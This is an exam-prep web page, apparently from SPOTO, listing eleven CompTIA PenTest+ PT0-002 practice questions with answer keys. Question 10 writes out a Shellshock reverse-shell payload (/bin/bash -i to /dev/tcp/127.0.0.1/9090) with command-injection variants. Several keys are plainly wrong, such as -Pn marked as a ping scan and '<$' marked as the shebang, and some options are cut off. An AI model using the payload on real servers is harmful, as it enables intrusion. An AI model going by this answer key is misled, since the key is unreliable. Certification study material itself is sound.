DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

2024 Updated CompTIA PT0-002 Exam Questions & Practice Tests, CompTIA PenTest+ Certification | SPOTO

Prepare to ace your CompTIA PenTest+ (PT0-002) certification with our comprehensive study resources. The best way to ensure success on the exam is by practicing with the latest exam questions. Our study materials cover a wide range of topics and scenarios, including hands-on penetration testing and vulnerability management tasks. With access to practice tests, sample questions, exam dumps, and exam questions and answers, you'll build the knowledge and skills needed to excel. Our mock exams and exam simulator provide a realistic exam experience to further enhance your preparation. Utilize our exam materials and exam answers to reinforce your understanding and readiness for the PT0-002 exam. With our study resources, you'll be well-prepared to demonstrate your cybersecurity expertise and achieve success in earning your CompTIA PenTest+ certification.
Take other online exams
Question #1
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
A. Cost ofthe assessment
B. Report distribution
C. Testing restrictions
D. Liability
View answer
Correct Answer: C
Question #2
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?
A. NIST SP 800-53
B. OWASP Top 10
C. MITRE ATT&CK framework
D. PTES technical guidelines
View answer
Correct Answer: C
Question #3
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?
A. Wait for the next login and perform a downgrade attack on the server
B. Capture traffic using Wireshark
C. Perform a brute-force attack over the server
D. Use an FTP exploit against the server
View answer
Correct Answer: B
Question #4
Which of the following tools provides Python classes for interacting with network protocols?
A. Responder
B. Impacket
C. Empire
D. PowerSploit
View answer
Correct Answer: B
Question #5
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
A. nmap –vv sUV –p 53, 123-159 10
B. nmap –vv sUV –p 53,123,161-162 10
C. nmap –vv sUV –p 53,137-139,161-162 10
D. nmap –vv sUV –p 53, 122-123, 160-161 10
View answer
Correct Answer: B
Question #6
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
A. Wireshark
B. Nessus
C. Retina
D. Burp Suite
E. Shodan
F. Nikto
View answer
Correct Answer: A
Question #7
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?
A. nmap -sn 10
B. nmap -sV -A 10
C. nmap -Pn 10
D. nmap -sT -p- 10
View answer
Correct Answer: C
Question #8
A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap –O –A –sS –p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
A. A firewall or IPS blocked the scan
B. The penetration tester used unsupported flags
C. The edge network device was disconnected
D. The scan returned ICMP echo replies
View answer
Correct Answer: D
Question #9
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)
A. IP addresses and subdomains
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results
View answer
Correct Answer: A
Question #10
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10
View answer
Correct Answer: D
Question #11
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. <#
B. <$
C. ##
D. #$
E. #!
View answer
Correct Answer: B

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.